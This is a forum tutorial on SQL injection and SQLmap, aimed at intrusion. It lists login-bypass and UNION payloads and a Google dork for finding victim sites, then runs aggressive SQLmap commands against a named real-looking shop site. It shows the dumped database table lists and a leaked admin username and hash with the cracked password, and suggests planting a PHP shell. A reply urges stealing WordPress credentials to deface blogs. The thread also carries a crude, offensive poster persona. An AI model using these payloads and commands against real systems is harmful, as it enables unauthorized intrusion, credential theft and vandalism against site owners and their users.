User Controls

Sophie's basic SQL Injection and SQLmap tutorial.

  1. #1
    Sophie Pedophile Tech Support
    SQLi is pretty lulzy and SQLmap is dank as fuck. In this thread i'll teach you the basics of SQL injection and how to use SQLmap to hack into databases. Now if you want to be a proper web app pentester you should familiarize yourself with at least the basics of the various programming languages used in web app development. Namely; HTML, SQL, PHP, javascript and such. I'm not one to talk though because i can't web dev for shit. Anyway, let's get to it.

    The oldest trick in the book is injecting this into a login form. Just type it into the form as value for username and/or password.

    ' or ''='


    The reason why this works is at follows. Sometimes when you have a login form the input is checked against the columns in the database. So if username X and password X are found TRUE is returned and you can login. What this query does id force the database to return TRUE so you can login even without using the proper credentials. Now you could also do this by using a comment operator. a query liek that would look a little like this.

    ' or 1--


    The comment operator here is double dash so everything after that is not going to be executed. Server side it will look like this:

    select username,pass from users where username='' or true;

    Where or true is represented in the code as or 1 and the comment operater prevents anything from being executed after true;.

    Now you could also use a vulnerable form to check how many columns the query uses. The code you'd need to inject would look a little like this:


    ' order by 5--+-


    If the page returns an error that looks like this: Unknown column 5 in 'order clause'. You'll know you have the wrong amount of columns lower the amount like so:


    ' order by 2--+-


    And if the page does not return an error you'll know the query uses at least 2 columns. You could also use union select to find out the server version and database name and a lot of other neat information. A query for finding out version and DB name will look a bit like this:


    ' union select version(),database()--+-


    The reults will be displayed on the page. Anyway, all of this is injection via the POST method, if you want to use SQLmap for post injection you're going to need to have to find out what the post request looks like before you can tell SQLmap which parameters you want to try to inject. But i'll get into that later.

    Alright so we covered the very basics of manual injection now lets see how we can let SQLmap do all the work for us. First you'll need to get SQLmap of course. If you you're not on kali,or backbox then what the hell are you doing in this thread? Anyway, if you're on any other linux distro it won't come preinstalled. Open up your terminal and type this.

    sudo apt-get install git

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    Now you cd to the proper directory. Once there type python sqlmap.py to open it.

    Anyway to hack a database you'll first need a victim site. To find one you use google dorks, google is your friend. Here's a quick dork for you inurl:basket.php?id= type that into google and it will return a list of sites. Let's select the top one for now.

    http://www.vritikaherbotech.com/basket.php?id=5

    Ok so what now? Now we'll want to see if we can execute queries through manipulating the URL, to do this we're going to try to purposefully have the database throw an error. We do this by adding %27 right after the value of 5 for the id parameter. %27 is UTF-8 encoded apostrophe in case you're wondering.

    http://www.vritikaherbotech.com/basket.php?id=5%27

    Click it, you'll see the following error messages.

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 208

    Warning: Division by zero in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 219

    Warning: Division by zero in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 225

    Bingo, now we can point SQLmap in the direction of the site we found.

    CD to your SQlmap directory and type this into your terminal passing the following arguments to SQLmap.

    python sqlmap -o --level=5 --risk=3 --random-agent --url=http://www.vritikaherbotech.com/basket.php?id=5 --priv-esc --current-user --tables

    I'll give you a quick run down of the arguments used here for clarity. -o means 'turn all optimisation switches on' --level is a little like risk and will determine if SQLmap will use dangerous queries that might 505/500 internal server error the server. Obviously we don't give a shit about breaking the server so go ahead and set everything to full throttle. --random-agent will make it so SQLmap selects a random user agent to be used when accessing the site so it looks less like a script. --priv-es tried to elevate the current database user's privilege to root. --current-user will tell you which user you are when you get into the database and --tables tells SQLmap to enumerate the tables of the databases found.

    Press enter and watch the magic happen. Greentext will fill your terminal for a while and you can take this moment to feel like a 1337 ub4r h4xx0r. At some point SQLmap will tell you.

    GET parameter 'id' is vulnerable to injection so and so want to test for any other parameters? Y/N

    You're gonna' press no. Which will make SQLmap fire the payload needed to retreive the tables. If you've been following this tutorial your output will look exactly like this.


    Database: ascentwe_psdslice
    [29 tables]
    +---------------------------------------+
    | order_form |
    | wp_bwbps_categories |
    | wp_bwbps_customdata |
    | wp_bwbps_favorites |
    | wp_bwbps_fields |
    | wp_bwbps_forms |
    | wp_bwbps_galleries |
    | wp_bwbps_imageratings |
    | wp_bwbps_images |
    | wp_bwbps_layouts |
    | wp_bwbps_lookup |
    | wp_bwbps_params |
    | wp_bwbps_ratingssummary |
    | wp_commentmeta |
    | wp_comments |
    | wp_contact_us |
    | wp_links |
    | wp_ngg_album |
    | wp_ngg_gallery |
    | wp_ngg_pictures |
    | wp_options |
    | wp_package_price |
    | wp_postmeta |
    | wp_posts |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+

    Database: ascentwe_vritika
    [5 tables]
    +---------------------------------------+
    | basket |
    | customer_comment |
    | item_master |
    | members |
    | tbl_search |
    +---------------------------------------+

    Database: ascentwe_devanshu
    [12 tables]
    +---------------------------------------+
    | wp_commentmeta |
    | wp_comments |
    | wp_contact_form_7 |
    | wp_links |
    | wp_options |
    | wp_postmeta |
    | wp_posts |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+

    Database: ascentwe_gmhat
    [6 tables]
    +---------------------------------------+
    | active_guests |
    | active_users |
    | admin |
    | country |
    | registration |
    | users |
    +---------------------------------------+

    Database: ascentwe_shangaila
    [57 tables]
    +---------------------------------------+
    | order |
    | admin |
    | canned |
    | cart |
    | chat |
    | chatinfo |
    | chatlogs |
    | chatrating |
    | department |
    | email |
    | excludeip |
    | members |
    | membership_change |
    | newsletter_subscriptions |
    | operator |
    | oprdept |
    | oprsession |
    | order_product |
    | order_status |
    | profile_picture |
    | shop_policy |
    | sociallinks |
    | spamip |
    | tbl_billing_shipping |
    | tbl_category |
    | tbl_content | |
    | tbl_google_analy |
    | tbl_innerpage_category |
    | tbl_inquiry |
    | tbl_log |
    | tbl_products |
    | tbl_shipping_master |
    | tbl_spon_featured |
    | tbl_store_seo |
    | tbl_systemsettings |
    | tbl_wish_artist |
    | tbl_wish_list |
    | tblcountry |
    | tbldistrict |
    | tblnewsletters |
    | tbluseremail |
    | transactions |
    | user_ratings |
    | user_review |
    | wp_commentmeta |
    | wp_comments |
    | wp_links |
    | wp_options |
    | wp_postmeta |
    | wp_posts |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+

    Database: ascentwe_phpteam
    [33 tables]
    +---------------------------------------+
    | wp_commentmeta |
    | wp_comments |
    | wp_contact_form_7 |
    | wp_customer_queries |
    | wp_customer_query |
    | wp_gallery_slides |
    | wp_links |
    | wp_meenewsendpended |
    | wp_meenewslinks |
    | wp_meenewssavednewsletters |
    | wp_meenewsstats |
    | wp_meenewstatsclick |
    | wp_meenewsusedposts |
    | wp_meenewsusers |
    | wp_meenewvariantstats |
    | wp_ngg_album |
    | wp_ngg_gallery |
    | wp_ngg_pictures |
    | wp_options |
    | wp_oqey_gallery |
    | wp_oqey_images |
    | wp_oqey_music |
    | wp_oqey_music_rel |
    | wp_oqey_skins |
    | wp_postmeta |
    | wp_posts |
    | wp_queries |
    | wp_slider3d_gallery |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+

    Database: ascentwe_psdsliceblog
    [12 tables]
    +---------------------------------------+
    | sociallinks |
    | wp_commentmeta |
    | wp_comments |
    | wp_links |
    | wp_options |
    | wp_postmeta |
    | wp_posts |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+

    Database: information_schema
    [45 tables]
    +---------------------------------------+
    | CHARACTER_SETS |
    | CLIENT_STATISTICS |
    | COLLATIONS |
    | COLLATION_CHARACTER_SET_APPLICABILITY |
    | COLUMNS |
    | COLUMN_PRIVILEGES |
    | ENGINES |
    | EVENTS |
    | FILES |
    | GLOBAL_STATUS |
    | GLOBAL_VARIABLES |
    | INDEX_STATISTICS |
    | INNODB_BUFFER_PAGE |
    | INNODB_BUFFER_PAGE_LRU |
    | INNODB_BUFFER_POOL_STATS |
    | INNODB_CMP |
    | INNODB_CMPMEM |
    | INNODB_CMPMEM_RESET |
    | INNODB_CMP_RESET |
    | INNODB_LOCKS |
    | INNODB_LOCK_WAITS |
    | INNODB_TRX |
    | KEY_COLUMN_USAGE |
    | PARAMETERS |
    | PARTITIONS |
    | PLUGINS |
    | PROCESSLIST |
    | PROFILING |
    | REFERENTIAL_CONSTRAINTS |
    | ROUTINES |
    | SCHEMATA |
    | SCHEMA_PRIVILEGES |
    | SESSION_STATUS |
    | SESSION_VARIABLES |
    | STATISTICS |
    | TABLES |
    | TABLESPACES |
    | TABLE_CONSTRAINTS |
    | TABLE_PRIVILEGES |
    | TABLE_STATISTICS |
    | THREAD_STATISTICS |
    | TRIGGERS |
    | USER_PRIVILEGES |
    | USER_STATISTICS |
    | VIEWS |
    +---------------------------------------+

    Database: ascentwe_awt
    [16 tables]
    +---------------------------------------+
    | customer_queries |
    | profiles |
    | redirects |
    | wp_commentmeta |
    | wp_comments |
    | wp_customer_queries |
    | wp_links |
    | wp_options |
    | wp_postmeta |
    | wp_posts |
    | wp_queries |
    | wp_term_relationships |
    | wp_term_taxonomy |
    | wp_terms |
    | wp_usermeta |
    | wp_users |
    +---------------------------------------+


    Noice, i see an interesting entry in the database called ascentwe_gmhat, if you look closely we have a table for admin. Obviously we want the admin credentials. Get them like this:

    python sqlmap -o --level=5 --risk=3 --random-agent --url=http://www.vritikaherbotech.com/basket.php?id=5 -D ascentwe_gmhat -T admin --dump

    Here's my output.

    Username:admin
    Password:21232f297a57a5a743894a0e4a801fc3

    Dehashing passwords is pretty easy, there are a number of online services and programs to help you out. It so happens that this password dehashes to 'admin' top fucking kek. Unfortunately these aren't the credentials needed for logging in to the administration section of the site, trust me i checked. However we can see a number of other entries for 'admin in the various databases. Go ahead and try to dump them.

    Also.



    If so, maybe the database system management user has write privilege to /www/var if so, we might be able to upload a PHP shell and that means game fucking over. Also, observant readers will note i purposefully left out two tables in a specific database. If you want to, you can go ahead and try to find out which i left out. Consider it practice, trust me it will be worth it. But i'm gonna' beat you to it.

    Also if your injection method will be via POST you're going to need to intercept the post request with an intercepting proxy like OWASP ZED. A general post request for a login form might look like this

    seed=&username=&password=

    Different requets will look differently, you enter post data into SQLmap by using this argument:

    --data="seed=&username=&password="

    Etcetera, happy hacking.
  2. #2
    Sophie Pedophile Tech Support
    Also [size=6] wordpress credentials[/size] get them so you can change their blogs to goatse and shit.
Jump to Top